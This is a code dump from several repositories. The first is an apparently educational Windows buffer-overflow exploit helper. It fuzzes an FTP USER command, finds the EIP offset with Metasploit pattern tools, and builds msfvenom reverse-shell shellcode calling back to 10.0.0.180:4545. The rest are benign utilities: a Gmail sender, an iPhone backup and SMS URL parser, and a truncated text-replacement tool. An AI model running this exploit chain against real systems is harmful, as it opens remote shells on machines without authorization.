metadata | text
---|---
{
"source": "13alvone/cspeakes_buffer_overflow",
"score": 3
} |
#### File: 13alvone/cspeakes_buffer_overflow/py27_ver.py
```python
from __future__ import print_function
from sys import stdout
import socket
import time
import sys
import os
# CHECK FOR CORRECT NUMBER OF ARGUMENTS =================================================
if len(sys.argv) != 3:
print('[TEST_FOR_OVERFLOW_LOCATION]')
print('[Usage]: python cspeakes_buffer.py <target_ip> <target_port>')
exit()
# GLOBAL VARIABLES ======================================================================
ip_addr = sys.argv[1] # IP Addr we are pointing to
STATIC_LEN = 6000 # Max buffer we are testing for
port = int(sys.argv[2]) # Port to send the payload to
reg_word_test = '' # User Defined Later in the program
register_candidate = '' # User Defined STR used for final report only
second_offset = '' # Used to derive distance from offset to second_offset
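# Note: '\x00' is deliberately absent from bad_chars below; a NUL byte terminates C strings
# and is assumed bad from the start, so the sweep only needs to cover \x01-\xff.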
bad_chars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
# CUSTOM FUNCTIONS ======================================================================
def send_var(var):
try:
start_time = time.time()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10.0) # Timeout in seconds (S)
connect = s.connect((ip_addr,port))
s.recv(1024)
s.send('USER ' + str(var) + '\r\n') # <REFACTOR> if target requires different syntax/proto
s.recv(1024)
#s.send('PASS ' + var + '\r\n') # <REFACTOR> if target requires different syntax/proto
#s.send('QUIT\r\n') # <REFACTOR> if target requires different syntax/proto
s.close()
print('Success! Maybe....\n')
except socket.timeout:
print("Connection Timed Out!")
exit()
def print_initial_output(offset, EIP_REG_0, ascii_location, B, U, FF, ER):
msg = '# =============================================================\n'
msg += '# Current Offset: ' + str(offset) + '\n'
msg += '# EIP register\'s value @Crash: ' + str(EIP_REG_0) + '\n'
msg += '# EIP register Value : ' + B + U + FF + ER + '\n'
msg += '# From Big to Little Endian: ' + ER + FF + U + B + '\n'
print(msg)
def continue_msg():
msg = '\n# ***************************\n'
msg += 'Perform the following steps before moving onward:\n'
msg += '1. Reboot [WINDOWS]\n2. Open Immunity\n'
msg += '3. Attach to the target process\n4. Un-pause Immunity\n'
	msg += 'Please type "go" when you have completed these steps\n'
	msg += 'or type "cancel" to exit the program\n'
msg += '# ***************************\n'
response = raw_input(msg)
response = response.lower()
if response == 'cancel':
exit(0)
elif response == 'go':
pass
while response != 'go':
try_again = 'Please type only "go" to continue or "cancel" to stop everything:\n'
response = raw_input(try_again)
if response == 'cancel':
exit(0)
def increase_len_msg():
global STATIC_LEN
msg = '# =============================================================\n'
msg += 'Your current buffer length is set to 6000 bytes.\n'
msg += 'Would you like to increase that to widen the buffer? (Y|N)\n'
response = raw_input(msg)
response = response.lower()
if response == 'y' or response == 'yes':
msg = 'Please enter the length in ascii characters you would like:\n'
msg += '\t***Remember*** each ascii character == 1 byte ******\n'
try:
response = raw_input(msg)
output = int(response)
except:
output = 'error'
else:
output = STATIC_LEN
return output
def main():
global register_candidate
global STATIC_LEN
global bad_chars
print('STEP 0 ==================================================')
intro_msg = '[TESTING FOR OVERFLOW LOCATION to LENGTH == ' + str(STATIC_LEN) + ']\n'
print(intro_msg)
sys_command = '/usr/share/metasploit-framework/'
sys_command += 'tools/exploit/pattern_create.rb -l ' + str(STATIC_LEN)
print('The command used to generate random, non-repeating string is:')
print(sys_command)
var = os.popen(sys_command).read()
send_var(var)
EIP_REG = raw_input('Please input the EIP Register value the program failed on: ')
print('\nSTEP 1 ==================================================')
B = str(EIP_REG[:2].lower())
U = str(EIP_REG[2:4].lower())
FF = str(EIP_REG[4:6].lower())
ER = str(EIP_REG[6:8].lower())
ascii_location = str(chr(int(ER,16))) + str(chr(int(FF,16))) + \
str(chr(int(U,16))) + str(chr(int(B,16)))
sys_command = '/usr/share/metasploit-framework/'
sys_command += 'tools/exploit/pattern_offset.rb -l '
sys_command += str(STATIC_LEN) + ' -q ' + str(ascii_location)
sys_command_output = os.popen(sys_command).read()
offset = sys_command_output.split(' ')
offset = int(offset[len(offset) - 1].strip('\n'))
print_initial_output(offset, EIP_REG, ascii_location, B, U, FF, ER)
print('STEP 2 ==================================================\n')
test_chars = raw_input('Please input 4 ASCII Chars for testing offset: ')
reg_word_test = str(test_chars)
_buffer = []
for char in test_chars:
_buffer.append(char.encode('hex'))
B = str(_buffer[0])
U = str(_buffer[1])
FF = str(_buffer[2])
ER = str(_buffer[3])
B_U_FF_ER = B + U + FF + ER
ER_FF_U_B = ER + FF + U + B
new_var = ('A' * offset) + str(reg_word_test) + ('C' * 90)
msg = 'The updated variable now becomes....\n'
msg += "new_var = (\'A\' * offset) + \"" + str(reg_word_test)
msg += "\" + (\'C\' * 90)\n\n"
continue_msg()
print('STEP 3 ==================================================\n')
send_var(new_var)
msg = '[CONFIRM HERE] - Your EIP register should read: ' + str(ER_FF_U_B) + '\n'
msg += 'Look for any Register containing an address that points to the beginning,\n'
msg += 'or anywhere remotely close to the beginning of your [A] or [C] buffer zones.\n'
	msg += 'This is likely to be a good spot to place our shellcode.\n'
msg += '\n*** ALSO NOTE Make sure we have at least 400 bytes between this addr\n'
msg += 'and the end of your total buffer. (ie. last addr of last [C] buffer component)\n'
	msg += 'Otherwise, you need to increase the "length" variable found in "configuration"\n\n'
print(msg)
new_len = increase_len_msg()
while new_len == 'error':
new_len = increase_len_msg()
# POTENTIAL REFACTOR might be needed here if there is a different target
payload = ('A' * offset) + str(reg_word_test) + bad_chars + ((new_len - STATIC_LEN) * 'C')
msg = 'The updated variable now becomes....\n'
msg += "new_var = (\'A\' * offset) + \"" + str(reg_word_test)
msg += "\" + bad_chars)\n\n"
msg += '\t***Please note, final buffer written to \"cs.payload\"\n'
	msg += '\t***Also, the bad_chars were added to aid in the next step.\n'
f_out = open('cs.payload','w')
f_out.write(payload)
f_out.close()
print(msg)
print('==============PROCEED TO NEXT CSPEAKES SCRIPT==================\n')
	msg = 'You must now focus!\nYou now have to find a good return address\n'
	msg += 'to place into the EIP register. This address should point near\n'
	msg += 'the beginning of one of your A or C buffers while leaving 350-400 bytes free.\n'
msg += 'REMEMBER THE BOOK: "If we can find an accessible, reliable address in\n'
msg += 'memory that contains an instruction such as JMP ESP, we could jump to it,\n'
msg += 'and in turn end up at the address pointed to, by the ESP register, at the time of the jump\n\n'
msg += 'Time to use .... cspeakes_badCharTest.py\n\nThis will help find bad chars.\n\nGodspeed!\n\n'
print(msg)
if __name__ == "__main__":
main()
```
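STEP 0 and STEP 1 above shell out to Metasploit's pattern_create.rb and pattern_offset.rb to turn the crash-time EIP value into a buffer offset. Below is a minimal Python 3 sketch of that same conversion, separate from the original script; the Kali path for pattern_offset.rb and the helper name `find_eip_offset` are assumptions for illustration only.

```python
# Hedged sketch: turn a crash-time EIP value (reported big-endian by the debugger) back
# into the 4 ASCII pattern bytes and ask pattern_offset.rb where they sit in the pattern.
import subprocess

PATTERN_OFFSET = '/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb'  # assumed path

def find_eip_offset(eip_hex, pattern_length=6000):
    raw = bytes.fromhex(eip_hex)                 # e.g. '39654138' -> b'9eA8'
    ascii_location = raw[::-1].decode('ascii')   # undo little-endian storage -> '8Ae9'
    out = subprocess.run([PATTERN_OFFSET, '-l', str(pattern_length), '-q', ascii_location],
                         capture_output=True, text=True, check=True)
    # pattern_offset.rb ends its report with the numeric offset, e.g. "... at offset 2606"
    return int(out.stdout.split()[-1])
```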
#### File: 13alvone/cspeakes_buffer_overflow/test.py
```python
import os
def execute_command(_sys_command):
print(f'[+] Command Used:\n[+] # user@pwn> {_sys_command}\n')
var_return = os.popen(_sys_command).read()
return var_return
def build_final_payload():
global ip, port
sys_command = f'msfvenom --payload windows/shell_reverse_tcp LHOST=10.0.0.180 LPORT=4545 ' \
f'EXITFUNC=thread -f c -a x86 --platform windows -b "\\x00\\x0a\\x0d\\xff" -n 20'
shellcode = execute_command(sys_command)
shellcode = ((''.join(shellcode.split('\n')[1:-1])).replace(';', '')).replace('"', '')
shellcode = bytes.fromhex(shellcode.replace('\\x', ''))
_a_buff = 'A' * 20
_c_buff = 'C' * 20
eip_le = bytes.fromhex('fb41bd7c')
a_buff_hex, b_buff_hex, c_buff_hex = '', '', ''
for a in _a_buff:
a_buff_hex += hex(ord(a)).replace('0x','')
for c in _c_buff:
c_buff_hex += hex(ord(c)).replace('0x','')
a_buff_hex = bytes.fromhex(a_buff_hex)
c_buff_hex = bytes.fromhex(c_buff_hex)
f_payload = a_buff_hex + eip_le + shellcode + c_buff_hex
#f_payload = bytearray.fromhex(f_payload).decode('iso-8859-1')
print(eip_le, '\n')
print(f_payload)
if __name__ == "__main__":
build_final_payload()
``` |
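test.py hard-codes the little-endian EIP bytes with `bytes.fromhex('fb41bd7c')`, which presumably corresponds to a return address of 0x7cbd41fb. A small sketch, not from the repository, showing that `struct.pack` yields the same four bytes without hand-reversing the hex string:

```python
# Hedged sketch: pack a 32-bit return address little-endian instead of reversing hex by hand.
import struct

jmp_esp_addr = 0x7cbd41fb                     # illustrative address only
eip_le = struct.pack('<I', jmp_esp_addr)      # 4 bytes, least-significant byte first
assert eip_le == bytes.fromhex('fb41bd7c')    # matches the literal used in test.py
```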
{
"source": "13alvone/gmailrunner",
"score": 2
} |
#### File: 13alvone/gmailrunner/gmail_cli_push.py
```python
from django.core.exceptions import ValidationError
from django.core.validators import URLValidator
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email import encoders
from pathlib import Path
import argparse
import logging
import smtplib
import ssl
import os
import re
# Global Variables
email_message = MIMEMultipart()
email_message['From'] = '<From Email Address>'
email_message['To'] = '<To Email Address>'
context = ssl.create_default_context()
passwd = os.getenv('GMAIL') # Define your local password as environment variable
smtp_server = "smtp.gmail.com"
port = 465 # Implicit SSL (SMTPS), matching smtplib.SMTP_SSL below; use 587 for STARTTLS instead
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--subject', help='Email Subject Line', default='BLANK', type=str, required=False)
parser.add_argument('-o', '--object', help='File or Web Path', type=str, required=True)
arguments = parser.parse_args()
return arguments
def attach_file(__object):
part = MIMEBase('application', "octet-stream")
with open(__object, 'rb') as file_in:
part.set_payload(file_in.read())
encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="{}"'.format(Path(__object).name))
email_message.attach(part)
file_in.close()
def is_valid_url(__object):
try:
URLValidator()(__object)
return True
except ValidationError as e:
logging.info(e)
return False
def send_message(__object,):
global email_message, context, passwd, smtp_server, port
with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:
server.login(email_message['From'], passwd)
formatted_message = f'subject:{__object["subject"]}\n{__object}'
server.sendmail(email_message['From'], email_message['To'], formatted_message)
def main():
global email_message, context, passwd, smtp_server, port
args = parse_args()
subject = args.subject
_object = args.object
email_message['Subject'] = subject
if is_valid_url(_object) or (isinstance(_object, str) and re.match('^http', _object)):
email_message.attach(MIMEText(_object))
send_message(email_message)
else:
print(hasattr(_object, 'r'))
attach_file(_object)
send_message(email_message)
if __name__ == '__main__':
main()
``` |
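A short usage sketch, separate from the script itself: it assumes the From/To placeholders above have been filled in and that the password is an app-specific password exposed through the GMAIL environment variable, as the comment in the script indicates; file names and the password value are examples.

```python
# Hedged usage sketch for gmail_cli_push.py.
import os
import subprocess

os.environ['GMAIL'] = 'app-specific-password'   # normally exported in the shell beforehand

# -o accepts either a local file (sent as an attachment) or an http(s) URL (sent as text).
subprocess.run(['python3', 'gmail_cli_push.py', '-s', 'nightly report', '-o', 'report.pdf'],
               check=True)
```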
{
"source": "13alvone/iphone_backup_parser",
"score": 3
} |
#### File: 13alvone/iphone_backup_parser/iphone_backup_parser.py
```python
import subprocess
import plistlib
import argparse
import sqlite3
import logging
import magic
import math
import time
import re
import os
# Global Variables
start_time = time.time()
report_list = []
url_set = set()
output_database = {}
file_walk_database = {}
sms_db_hash = None
sms_database = {}
magic_generator = magic.Magic(flags=magic.MAGIC_MIME_TYPE)
url_block_list = [
'content.icloud.com',
]
def is_sqlite3(_path):
process = subprocess.run(['file', _path], check=True, stdout=subprocess.PIPE, universal_newlines=True)
output = f'{process.stdout}'.lower()
if 'sqlite' in output:
return True
else:
return False
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file_path', help='Target SQLite3 Path', type=str, required=True)
arguments = parser.parse_args()
return arguments
def print_elapsed_time(_start_time):
seconds = round(int(time.time() - _start_time), 2)
minutes = math.trunc(seconds / 60)
remaining_seconds = math.trunc(seconds - (minutes * 60))
if len(f'{remaining_seconds}') != 2:
remaining_seconds = f'0{remaining_seconds}'
elapsed_time = f'{minutes}:{remaining_seconds}'
print(f'[i] Total_Time Elapsed: {elapsed_time}')
def convert_sqlite3_to_sql_dict(_path):
result_dict = {}
conn = sqlite3.connect(_path)
cursor = conn.cursor()
cursor.execute('SELECT name from sqlite_master where type="table"')
tables = cursor.fetchall()
for table in tables:
table_name = table[0]
qry = f'SELECT * from "{table_name}"'
cursor.execute(qry)
contents = cursor.fetchall()
for content in contents:
uuid = content[0]
key = f'{table_name}_{uuid}'
result_dict[key] = content
return result_dict
def iterate_sql_dict(_sqlite3_dict):
global report_list, sms_database
for key in _sqlite3_dict:
report_list.append(f'[+] Item: {key}\n')
if isinstance(_sqlite3_dict[key], dict):
iterate_sql_dict(_sqlite3_dict[key])
else:
data_body = _sqlite3_dict[key]
report_list.append(f'[^] {data_body}\n')
try:
generate_cleaned_manifest_entry(data_body, print_item=False) # Do Iterative Action From Here Down...
except:
pass
if sms_db_hash:
sms_database[key] = data_body
def global_filter(_obj):
global url_set, url_allow_list
if isinstance(_obj, int) or isinstance(_obj, str):
re_extract_urls(_obj)
return _obj
elif isinstance(_obj, bytes):
_obj_raw_ascii = _obj.decode('ascii', 'ignore')
if 'bplist' in _obj_raw_ascii:
try:
_obj = plistlib.loads(_obj, fmt=None, dict_type=dict)
re_extract_urls(_obj)
except:
pass
return _obj
elif isinstance(_obj, dict):
re_extract_urls(_obj)
for key in _obj:
_obj[key] = global_filter(_obj[key])
return _obj
elif isinstance(_obj, list) or isinstance(_obj, tuple):
re_extract_urls(_obj)
new_list = []
for item in _obj:
new_list.append(global_filter(item))
_obj = new_list
return _obj
elif isinstance(_obj, set):
re_extract_urls(_obj)
new_set = set()
for item in _obj:
new_set.add(global_filter(item))
_obj = new_set
return _obj
def generate_cleaned_manifest_entry(_data_body, print_item=True):
global output_database, sms_db_hash
serial = _data_body[0]
directory_data = 'Unknown'
data_type = 'Unknown'
manifest_entry_dict = {
'path': directory_data,
'domain': _data_body[1],
'sql_entry': _data_body[2],
'unknown_number': _data_body[3],
'data': _data_body[4],
'type': data_type,
}
output_database[serial] = manifest_entry_dict
try:
if 'sms.db' in manifest_entry_dict['sql_entry']:
sms_db_hash = serial
except TypeError:
pass
if print_item:
		msg = f'{"-" * 50}\n[+] {serial}\n' \
			f'[^] Path:\t{manifest_entry_dict["path"]}\n' \
			f'[^] Domain:\t{manifest_entry_dict["domain"]}\n' \
			f'[^] SQL Entry:\t{manifest_entry_dict["sql_entry"]}\n' \
			f'[^] Unknown:\t{manifest_entry_dict["unknown_number"]}\n' \
			f'[^] Manifest Data:\t{manifest_entry_dict["data"]}\n' \
			f'[^] Type:\t{manifest_entry_dict["type"]}'
print(msg)
def add_url(_url):
global url_set, url_block_list
for blocked_url in url_block_list:
if blocked_url in _url:
return None
url_set.add(_url)
def re_extract_urls(_data):
try:
if isinstance(_data, list) or isinstance(_data, tuple) or isinstance(_data, set):
for entry in _data:
url_list = re.findall(r'(https?://\S+)', entry)
for url in url_list:
add_url(url)
elif isinstance(_data, dict):
for key in _data:
url_list0 = re.findall(r'(https?://\S+)', key)
url_list1 = re.findall(r'(https?://\S+)', _data[key])
for url in url_list0:
add_url(url)
for url in url_list1:
add_url(url)
elif isinstance(_data, str):
url_list = re.findall(r'(https?://\S+)', _data)
for url in url_list:
add_url(url)
elif isinstance(_data, bytes):
url_list = re.findall(r'(https?://\S+)', _data.decode('ascii', 'ignore'))
for url in url_list:
add_url(url)
except TypeError as e:
logging.info(e)
def process_data_set(_sqlite3_dict, print_report=False):
global report_list
report_list.clear()
iterate_sql_dict(_sqlite3_dict)
if print_report:
for entry in report_list:
print(entry)
def walk_the_backup(_path):
global file_walk_database
target_path = '/'.join(_path.split('/')[:-1])
for root, dirs, files in os.walk(target_path, topdown=False):
for filename in files:
full_path = f'{root}/{filename}'
file_walk_database[filename] = full_path
def print_types_dict(_input_dict):
for key in _input_dict:
print(f'[+] MIME Type: {key}\t\t{_input_dict[key]}')
def filter_by_domain_str(_filter_str, print_types=False):
global output_database
result_dict = {}
type_dict = {}
for key in output_database:
if output_database[key]['path'] != 'Unknown' and output_database[key]['domain'] == _filter_str:
if print_types:
print(f'[+] {key}\n[^] {output_database[key]}\n{"-" * 50}\n')
result_dict[key] = output_database[key]
if output_database[key]['type'] not in type_dict:
type_dict[output_database[key]['type']] = 1
elif output_database[key]['type'] in type_dict:
type_dict[output_database[key]['type']] += 1
if print_types:
print_types_dict(type_dict)
return result_dict
def filter_manifest_by_mime_type(_mime_type_str, print_report=False): # This is a `contains` filter
global output_database
result_dict = {}
type_dict = {}
for key in output_database:
if output_database[key]['path'] != 'Unknown' and _mime_type_str in output_database[key]['type']:
if print_report:
print(f'[+] {key}\n[^] {output_database[key]}\n{"-" * 50}\n')
result_dict[key] = output_database[key]
if output_database[key]['type'] not in type_dict:
type_dict[output_database[key]['type']] = 1
elif output_database[key]['type'] in type_dict:
type_dict[output_database[key]['type']] += 1
if print_report:
print_types_dict(type_dict)
return result_dict
def filter_manifest_by_sql_entry(_sql_entry_str, print_report=False): # This is a `contains` filter
global output_database
result_dict = {}
type_dict = {}
for key in output_database:
if output_database[key]['path'] != 'Unknown' and _sql_entry_str in output_database[key]['sql_entry']:
if print_report:
print(f'[+] {key}\n[^] {output_database[key]}\n{"-" * 50}\n')
result_dict[key] = output_database[key]
if output_database[key]['type'] not in type_dict:
type_dict[output_database[key]['type']] = 1
elif output_database[key]['type'] in type_dict:
type_dict[output_database[key]['type']] += 1
if print_report:
print_types_dict(type_dict)
return result_dict
def copy_to_tmp(_output_database):
target_path = f'{time.strftime("%Y%m%d-%H%M%S")}_output'
subprocess.run(f'mkdir {target_path}', shell=True, check=True, stdout=subprocess.PIPE)
for key in _output_database:
filename = output_database[key]['sql_entry'].split('/')[-1].replace(' ', '_')
file_path = output_database[key]['path']
cmd = f'cp "{file_path}" "{target_path}/{filename}"'
subprocess.run(cmd, shell=True, check=True, stdout=subprocess.PIPE)
def examine_and_process_db_file(_file_path, print_report=False):
global output_database
output_database = {}
if is_sqlite3(_file_path):
sqlite3_dict = convert_sqlite3_to_sql_dict(_file_path)
if print_report:
process_data_set(sqlite3_dict, print_report=True)
else:
process_data_set(sqlite3_dict)
walk_the_backup(_file_path)
else:
logging.info(f'[!] The following supplied file path is not SQLite3\n{_file_path}\n')
def add_metadata_to_db_file():
global file_walk_database
sha1_file_set = set(file_walk_database.keys())
for key in output_database:
if key in sha1_file_set:
location = file_walk_database[key]
file_type = magic_generator.id_filename(location)
output_database[key]['path'] = location
output_database[key]['type'] = file_type
def process_url_file():
	global sms_database, output_database, url_set
if sms_db_hash is not None:
_path = output_database[sms_db_hash]['path']
examine_and_process_db_file(_path)
for key in sms_database:
sms_database[key] = global_filter(sms_database[key])
f_out = open('urls.txt', 'w')
for url in url_set:
f_out.write(f'{url}\n')
f_out.close()
def main():
global start_time
args = parse_args()
file_path = args.file_path
examine_and_process_db_file(file_path)
add_metadata_to_db_file()
	# filter_by_domain_str('RootDomain', print_types=True) # Filter By Domain String Example
# filter_manifest_by_mime_type('text/plain', print_report=True) # Filter By MIME Extension Type Example
# filter_manifest_by_sql_entry('sms.db', print_report=True) # Filter By SQL Entry String Example
# Copy Images Example
# filter_manifest_by_mime_type('image', print_report=True) # Filter Only Images for Image Copy Next
# copy_to_tmp(output_database) # Copy ALL MIME Image Type Files to /tmp
process_url_file()
print_elapsed_time(start_time)
if __name__ == "__main__":
main()
``` |
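The parser is driven by the backup's Manifest.db, whose Files table maps each hashed fileID to a domain and relative path (this is what generate_cleaned_manifest_entry unpacks positionally). Below is a minimal, self-contained query sketch; the table and column names follow the standard iTunes/Finder backup layout rather than anything defined in this script.

```python
# Hedged sketch: locate sms.db inside a backup via Manifest.db. Column names
# (fileID, domain, relativePath) follow the standard backup schema and are assumptions here.
import sqlite3

def find_sms_rows(manifest_path):
    conn = sqlite3.connect(manifest_path)
    try:
        cur = conn.cursor()
        cur.execute("SELECT fileID, domain, relativePath FROM Files "
                    "WHERE relativePath LIKE '%sms.db'")
        return cur.fetchall()
    finally:
        conn.close()

# The returned fileID names the on-disk copy of sms.db inside the backup folder
# (stored under a two-character subdirectory on recent iOS versions).
```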
{
"source": "13am/ezreplace",
"score": 3
} |
#### File: ezreplace/src/ezreplace.py
```python
from argparse import ArgumentParser
import sys
import tempfile
import os
import shutil
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE,SIG_DFL)
def parse_options():
parser = ArgumentParser()
parser.add_argument('--in',
dest='infile',
default=None,
help='Name of the input file to be modified. Leave out if you want to read \
the input from stdin.')
parser.add_argument('--out',
dest='outfile',
default=None,
help='Name of the output file. Leave out if you want to write \
the output to stdout.')
parser.add_argument('--in-place',
dest='in_place',
default=False,
action="store_true",
help='Save modifications in-place to the original file given with --in.')
parser.add_argument('--replacements',
dest='replacements',
default=None,
help='Name of the file containing (line by line) pairs of \"old new\" replacements.')
parser.add_argument('--default-replacement',
dest='default_replacement',
default=None,
help='Value to use when the value was not found in --replacements. Default: keep as is.')
parser.add_argument('--header',
dest='header',
default=False,
action="store_true",
help='Do not modify the first (header) line of the input file.')
parser.add_argument('--strip',
dest='strip',
default=False,
action="store_true",
help='Strip leading and trailing whitespace characters from the lines of the input file.')
parser.add_argument('--keep-hits-only',
dest='keep',
default=False,
action="store_true",
help='Only output lines where a replacement was made. Default = False.')
parser.add_argument('--column',
dest='column',
default=False,
help='Replace only in this specified column. The leftmost is column 1 etc.\
Multiple columns can be given by separating the column indexes with a comma, \
e.g. --column 1,2,5 would only replace in the first, second, and fifth columns and \
ignore matches elsewhere. If --column is not given, replacements are done as follows: \
                        1\) the targets to be replaced are sorted alphabetically \
2\) for each line, replacements are made in alphabetical order and replacements \
once made are NOT recursively replaced again. \
E.g.input line "dog lion cat cat tennis" \
with replacements "cat:tennis , tennis:football" would first replace "cat" with "tennis": \
"dog lion [tennis] [tennis] tennis" \
but only the original occurrence of "tennis" would be replaced by "football": \
"dog lion [tennis] [tennis] [football]" \
so that the final output line would be \
"dog lion tennis tennis football".')
parser.add_argument('--sep',
dest='sep',
default=False,
help='Use a specific string as field delimiter. \
In effect only if --column also specified. \
If not given, ezreplace will try to guess the separator and \
stops if it cannot make a good guess. \
Possible values are "tab", "space", "whitespace", or any string \
such as "this script is awesome" or ";" enclosed in quotes. If you use the \
"whitespace" keyword as the separator, continuous stretches of any whitespace \
characters will be used as field separators in the input and the output will be \
separated by single spaces.')
options = parser.parse_args()
return options
def deduce_delimiter(lines=[], strip=False):
space = set()
tab = set()
whitespace = set()
for ip_line in lines:
if strip:
ip_line = ip_line.strip()
tab.add(len(ip_line.split("\t")))
space.add(len(ip_line.split(" ")))
whitespace.add(len(ip_line.split(None)))
if 1 in space:
space.remove(1)
if 1 in tab:
tab.remove(1)
if 1 in whitespace:
whitespace.remove(1)
if len(tab) == 1 and len(space) != 1:
sep = "\t"
elif len(tab) != 1 and len(space) == 1:
sep = " "
elif len(whitespace) == 1:
sep = None
else:
sys.stderr.write('# Field separator not explicitly given and was not \
successfully deduced.\n')
sys.stderr.write('# Stopping.\n')
sys.exit()
sys.stderr.write('# Field separator successfully deduced.\n')
return sep
class Replacer:
def __init__(self):
self.exp_line_len = None
self.linecounter = 0
self.word_order = None
self.default_replacement = None
def check_line_len(self, line):
if self.exp_line_len is None:
self.exp_line_len = len(line)
return True
else:
return len(line) == self.exp_line_len
def set_default(self, val):
self.default_replacement = val
def replace_line(self, kwargs, ip_line=None, is_header=False):
if kwargs['strip']:
ip_line = ip_line.strip()
if kwargs['column'] is False:
op_line = [ip_line]
targets = [0]
if self.word_order is None:
self.word_order = sorted(kwargs['reps'].keys())
else:
op_line = ip_line.split(kwargs['sep'])
targets = kwargs['column']
if self.check_line_len(op_line) is not True:
sys.stderr.write('# Error: the number of columns in the input is not constant.\n')
sys.stderr.write('# Found {} columns on line {}.\n'\
.format(len(op_line), self.linecounter + 1 ))
sys.stderr.write('# Expected {} columns.\n'.format(self.exp_line_len))
sys.stderr.write('# Exit.\n')
return False
replaced = False
if is_header == False or kwargs['header'] == False:
# if replacing is NOT restricted to specific columns,
# replace everywhere on the line but do not multiple
# replacements of the same word
if kwargs['column'] is False:
for w in self.word_order:
ol = []
for i in op_line:
if type(i) != type('') or w not in i:
ol.append(i)
else:
for j in i.split(w):
ol.append(j)
ol.append([w])
ol.pop()
op_line = ol
ol = ''
for i in op_line:
if type(i) == type(''):
if i != '':
ol = ol + i
else:
replaced = True
kwargs['rep_counter'] += 1
replacement = kwargs['reps'][i[0]]
ol = ol + replacement
op_line = [ol]
# if replacement is to be done in specific columns,
# just get the replacements from the dict
else:
for i in targets:
try:
op_line[i] = kwargs['reps'][op_line[i]]
kwargs['rep_counter'] += 1
replaced = True
except KeyError:
kwargs['not_rep_counter'] += 1
if self.default_replacement is not None:
op_line[i] = self.default_replacement
if replaced:
kwargs['n_line_match'] += 1
else:
kwargs['n_line_no_match'] += 1
op = kwargs['opstream']
op_sep = kwargs['op_sep']
do_write_output = is_header or kwargs['keep'] == False or replaced
if do_write_output:
op.write(op_sep.join(op_line))
if kwargs['strip'] or kwargs['sep'] == None:
op.write('\n')
self.linecounter += 1
return True
def update_delimiters(options = None, start_lines = None):
# input field delimiter
    if options.column is not False:
if options.sep == False:
options.sep = deduce_delimiter(lines = start_lines, strip = options.strip)
else:
if options.sep == 'whitespace':
options.sep = None
else:
if options.sep == 'space':
options.sep = ' '
if options.sep == 'tab':
options.sep = '\t'
# output field delimiter
    if options.column is False:
options.op_sep = ''
else:
if options.sep == None:
options.op_sep = ' '
else:
options.op_sep = options.sep
return vars(options)
class Collect:
def __init__(self, kwargs):
self.__dict__.update(kwargs)
def finish(success, kwargs):
options = Collect(kwargs)
# close streams
if options.infile is not None:
options.ipstream.close()
if options.in_place and success:
tmp_name = options.opstream.name
options.opstream.close()
info_line = "# In-place modify: replacing {} with the tmp file {}.\n"\
.format(options.infile, tmp_name)
sys.stderr.write(info_line)
try:
os.rename(tmp_name, options.infile)
except OSError:
try:
sys.stderr.write("# Using shutil.move.\n")
shutil.move(tmp_name, options.infile)
except:
sys.stderr.write("# Replacement unsuccessful.\n")
elif options.outfile is not None:
options.opstream.close()
else:
pass
# show some statistics
if success:
sys.stderr.write("# Replaced {} words.\n".\
format(kwargs['rep_counter']))
if kwargs['column'] is not False:
sys.stderr.write("# No replacement was found for {} words.\n"\
.format(kwargs['not_rep_counter']))
sys.stderr.write("# {} lines had at least one word replaced.\n"\
.format(kwargs['n_line_match']))
sys.stderr.write("# {} lines did not have any replacements made.\n"\
.format(kwargs['n_line_no_match']))
sys.stderr.write("# Done.\n")
sys.exit()
def main():
options = parse_options()
# set up the input
if options.infile is not None:
ip = open(options.infile, 'r')
else:
ip = sys.stdin
if options.in_place:
sys.stderr.write('# --in-place can only be used \
together with --in to specify the input file name.\n')
sys.exit()
options.ipstream = ip
# set up output
if options.in_place:
op = tempfile.NamedTemporaryFile(mode='w+t', delete=False)
elif options.outfile is not None:
op = open(options.outfile, 'w')
else:
op = sys.stdout
options.opstream = op
# parse the column notation
if options.column is not False:
options.column = [int(i.strip()) - 1
for i in options.column.split(',')]
# read the replacements into a dict
reps = {}
with open(options.replacements, 'r') as f:
for line in f:
line = line.strip()
if line != '':
line = line.split()
assert len(line) == 2
reps[line[0]] = line[1]
options.reps = reps
